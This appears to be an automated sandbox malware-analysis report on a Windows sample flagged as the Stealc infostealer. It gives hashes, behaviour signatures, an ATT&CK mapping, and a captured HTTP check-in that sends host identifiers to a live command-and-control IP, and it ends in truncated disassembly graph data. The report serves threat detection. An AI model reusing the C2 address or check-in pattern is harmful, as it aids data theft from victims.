                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009B9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B9750 mov eax, dword ptr fs:[00000030h]0_2_009B9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_009B78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6312, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_009B9600
                Source: file.exe, file.exe, 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: RProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_009B7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_009B7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_009B7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_009B7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.9a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1730488499.0000000005480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6312, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.9a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1730488499.0000000005480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6312, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory651
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe53%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.phpH17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpT17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phpTfile.exe, 00000000.00000002.1771889897.0000000001615000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpHfile.exe, 00000000.00000002.1771889897.0000000001615000.00000004.00000020.00020000.00000000.sdmptrueunknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.215.113.37
                		unknownPortugal
                		206894WHOLESALECONNECTIONSNLtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1532863
                Start date and time:2024-10-14 03:06:06 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 15s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:1
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 18
                • Number of non-executed functions: 83
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.945564787167383
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'778'176 bytes
                MD5:02fe6d790607494b5b820f41cdad2e17
                SHA1:1e526eb65c6c1677ced067310193991805faeea1
                SHA256:37008bff1b7f3719aee4bae2d90ba57c05618731bece25285e44160137e9c1d3
                SHA512:afece157f8dc32d871b23105990f4504be6b021580c68136a92de7421b8085d987e6f355d7bd760416ab40c64623156c0f7acba1e07e33ea94f6b860e436b904
                SSDEEP:24576:kRLj6R+0WGiGrja3PxORy383AHi9SbjCUozzhWRDFo/pnml2AglxMZ0d1Hm1CNB7:NRPWKja3JitQC9bNWRDFU22AKGwY
                TLSH:3485330A74573417CE6952336A0FC3BA022A4A3385A7176B73D78E8395FE949F530E6C
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                File Icon

                Icon Hash:90cececece8e8eb0

                Static PE Info

                General

                Entrypoint:0xa6f000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b

                Entrypoint Preview

                Instruction
                jmp 00007F0F710257DAh
                ltr word ptr [ebx]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add cl, ch
                add byte ptr [eax], ah
                add byte ptr [eax], al
                add byte ptr [eax+00h], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add cl, byte ptr [edx]
                add byte ptr [eax], al
                pop es
                or al, byte ptr [eax]
                add byte ptr [ebx], al
                or al, byte ptr [eax]
                add byte ptr [ebx], cl
                or al, byte ptr [eax]
                add byte ptr [0000000Ah], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [esi], al
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al
                add byte ptr [eax], al
                adc byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                or ecx, dword ptr [edx]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                xor byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                or al, byte ptr [eax]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Rich Headers

                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                0x10000x25b0000x228007a9e9ce790982fc43d631e2441a72627unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                0x25e0000x2840000x20069c8000d402f77aa35a6fadb31bb90f6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                njbeecvb0x4e20000x18c0000x18c0002873425bdc89f53307a06716a7711defFalse0.9945937647964015data7.953282127630772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                zajrgpdb0x66e0000x10000x4004cfcf98a8544f4d1fda034882eced509False0.7275390625data5.75819823192357IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant0x66f0000x30000x2200f4b2758e9c4a8cc5921f31574f189368False0.08846507352941177Applesoft BASIC program data, first line number 151.0166808854095564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                Imports

                DLLImport
                kernel32.dlllstrcpy

                Network Behavior

                Suricata IDS Alerts

                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-10-14T03:07:06.871801+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Oct 14, 2024 03:07:05.812427998 CEST4973080192.168.2.4185.215.113.37
                Oct 14, 2024 03:07:05.817724943 CEST8049730185.215.113.37192.168.2.4
                Oct 14, 2024 03:07:05.817847967 CEST4973080192.168.2.4185.215.113.37
                Oct 14, 2024 03:07:05.818192005 CEST4973080192.168.2.4185.215.113.37
                Oct 14, 2024 03:07:05.823048115 CEST8049730185.215.113.37192.168.2.4
                Oct 14, 2024 03:07:06.615434885 CEST8049730185.215.113.37192.168.2.4
                Oct 14, 2024 03:07:06.615540028 CEST4973080192.168.2.4185.215.113.37
                Oct 14, 2024 03:07:06.629586935 CEST4973080192.168.2.4185.215.113.37
                Oct 14, 2024 03:07:06.634742975 CEST8049730185.215.113.37192.168.2.4
                Oct 14, 2024 03:07:06.871690989 CEST8049730185.215.113.37192.168.2.4
                Oct 14, 2024 03:07:06.871800900 CEST4973080192.168.2.4185.215.113.37
                Oct 14, 2024 03:07:10.805037975 CEST4973080192.168.2.4185.215.113.37

                HTTP Request Dependency Graph

                • 185.215.113.37

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.449730185.215.113.37806312C:\Users\user\Desktop\file.exe
                TimestampBytes transferredDirectionData
                Oct 14, 2024 03:07:05.818192005 CEST89OUTGET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 14, 2024 03:07:06.615434885 CEST203INHTTP/1.1 200 OK
                Date: Mon, 14 Oct 2024 01:07:06 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 14, 2024 03:07:06.629586935 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIE
                Host: 185.215.113.37
                Content-Length: 211
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 38 43 36 31 37 38 32 32 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 2d 2d 0d 0a
                Data Ascii: ------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="hwid"B88C617822D72284582127------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="build"doma------HIDBFCBGDBKKECBFCGIE--
                Oct 14, 2024 03:07:06.871690989 CEST210INHTTP/1.1 200 OK
                Date: Mon, 14 Oct 2024 01:07:06 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s=


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                System Behavior

                General

                Target ID:0
                Start time:21:07:01
                Start date:13/10/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0x9a0000
                File size:1'778'176 bytes
                MD5 hash:02FE6D790607494B5B820F41CDAD2E17
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1730488499.0000000005480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:8.1%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:3.2%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:25
                  execution_graph 13356 9b69f0 13401 9a2260 13356->13401 13380 9b6a64 13381 9ba9b0 4 API calls 13380->13381 13382 9b6a6b 13381->13382 13383 9ba9b0 4 API calls 13382->13383 13384 9b6a72 13383->13384 13385 9ba9b0 4 API calls 13384->13385 13386 9b6a79 13385->13386 13387 9ba9b0 4 API calls 13386->13387 13388 9b6a80 13387->13388 13553 9ba8a0 13388->13553 13390 9b6b0c 13557 9b6920 GetSystemTime 13390->13557 13391 9b6a89 13391->13390 13394 9b6ac2 OpenEventA 13391->13394 13396 9b6ad9 13394->13396 13397 9b6af5 CloseHandle Sleep 13394->13397 13400 9b6ae1 CreateEventA 13396->13400 13399 9b6b0a 13397->13399 13399->13391 13400->13390 13754 9a45c0 13401->13754 13403 9a2274 13404 9a45c0 2 API calls 13403->13404 13405 9a228d 13404->13405 13406 9a45c0 2 API calls 13405->13406 13407 9a22a6 13406->13407 13408 9a45c0 2 API calls 13407->13408 13409 9a22bf 13408->13409 13410 9a45c0 2 API calls 13409->13410 13411 9a22d8 13410->13411 13412 9a45c0 2 API calls 13411->13412 13413 9a22f1 13412->13413 13414 9a45c0 2 API calls 13413->13414 13415 9a230a 13414->13415 13416 9a45c0 2 API calls 13415->13416 13417 9a2323 13416->13417 13418 9a45c0 2 API calls 13417->13418 13419 9a233c 13418->13419 13420 9a45c0 2 API calls 13419->13420 13421 9a2355 13420->13421 13422 9a45c0 2 API calls 13421->13422 13423 9a236e 13422->13423 13424 9a45c0 2 API calls 13423->13424 13425 9a2387 13424->13425 13426 9a45c0 2 API calls 13425->13426 13427 9a23a0 13426->13427 13428 9a45c0 2 API calls 13427->13428 13429 9a23b9 13428->13429 13430 9a45c0 2 API calls 13429->13430 13431 9a23d2 13430->13431 13432 9a45c0 2 API calls 13431->13432 13433 9a23eb 13432->13433 13434 9a45c0 2 API calls 13433->13434 13435 9a2404 13434->13435 13436 9a45c0 2 API calls 13435->13436 13437 9a241d 13436->13437 13438 9a45c0 2 API calls 13437->13438 13439 9a2436 13438->13439 13440 9a45c0 2 API calls 13439->13440 13441 9a244f 13440->13441 13442 9a45c0 2 API calls 13441->13442 13443 9a2468 13442->13443 13444 9a45c0 2 API calls 13443->13444 13445 9a2481 13444->13445 13446 9a45c0 2 API calls 13445->13446 13447 9a249a 13446->13447 13448 9a45c0 2 API calls 13447->13448 13449 9a24b3 13448->13449 13450 9a45c0 2 API calls 13449->13450 13451 9a24cc 13450->13451 13452 9a45c0 2 API calls 13451->13452 13453 9a24e5 13452->13453 13454 9a45c0 2 API calls 13453->13454 13455 9a24fe 13454->13455 13456 9a45c0 2 API calls 13455->13456 13457 9a2517 13456->13457 13458 9a45c0 2 API calls 13457->13458 13459 9a2530 13458->13459 13460 9a45c0 2 API calls 13459->13460 13461 9a2549 13460->13461 13462 9a45c0 2 API calls 13461->13462 13463 9a2562 13462->13463 13464 9a45c0 2 API calls 13463->13464 13465 9a257b 13464->13465 13466 9a45c0 2 API calls 13465->13466 13467 9a2594 13466->13467 13468 9a45c0 2 API calls 13467->13468 13469 9a25ad 13468->13469 13470 9a45c0 2 API calls 13469->13470 13471 9a25c6 13470->13471 13472 9a45c0 2 API calls 13471->13472 13473 9a25df 13472->13473 13474 9a45c0 2 API calls 13473->13474 13475 9a25f8 13474->13475 13476 9a45c0 2 API calls 13475->13476 13477 9a2611 13476->13477 13478 9a45c0 2 API calls 13477->13478 13479 9a262a 13478->13479 13480 9a45c0 2 API calls 13479->13480 13481 9a2643 13480->13481 13482 9a45c0 2 API calls 13481->13482 13483 9a265c 13482->13483 13484 9a45c0 2 API calls 13483->13484 13485 9a2675 13484->13485 13486 9a45c0 2 API calls 13485->13486 13487 9a268e 13486->13487 13488 9b9860 13487->13488 13759 9b9750 GetPEB 13488->13759 13490 9b9868 13491 9b987a 13490->13491 13492 9b9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13490->13492 13495 9b988c 21 API calls 13491->13495 13493 9b9b0d 13492->13493 13494 9b9af4 GetProcAddress 13492->13494 13496 9b9b46 13493->13496 13497 9b9b16 GetProcAddress GetProcAddress 13493->13497 13494->13493 13495->13492 13498 9b9b68 13496->13498 13499 9b9b4f GetProcAddress 13496->13499 13497->13496 13500 9b9b89 13498->13500 13501 9b9b71 GetProcAddress 13498->13501 13499->13498 13502 9b9b92 GetProcAddress GetProcAddress 13500->13502 13503 9b6a00 13500->13503 13501->13500 13502->13503 13504 9ba740 13503->13504 13505 9ba750 13504->13505 13506 9b6a0d 13505->13506 13507 9ba77e lstrcpy 13505->13507 13508 9a11d0 13506->13508 13507->13506 13509 9a11e8 13508->13509 13510 9a120f ExitProcess 13509->13510 13511 9a1217 13509->13511 13512 9a1160 GetSystemInfo 13511->13512 13513 9a117c ExitProcess 13512->13513 13514 9a1184 13512->13514 13515 9a1110 GetCurrentProcess VirtualAllocExNuma 13514->13515 13516 9a1149 13515->13516 13517 9a1141 ExitProcess 13515->13517 13760 9a10a0 VirtualAlloc 13516->13760 13520 9a1220 13764 9b89b0 13520->13764 13523 9a1249 __aulldiv 13524 9a129a 13523->13524 13525 9a1292 ExitProcess 13523->13525 13526 9b6770 GetUserDefaultLangID 13524->13526 13527 9b67d3 13526->13527 13528 9b6792 13526->13528 13534 9a1190 13527->13534 13528->13527 13529 9b67cb ExitProcess 13528->13529 13530 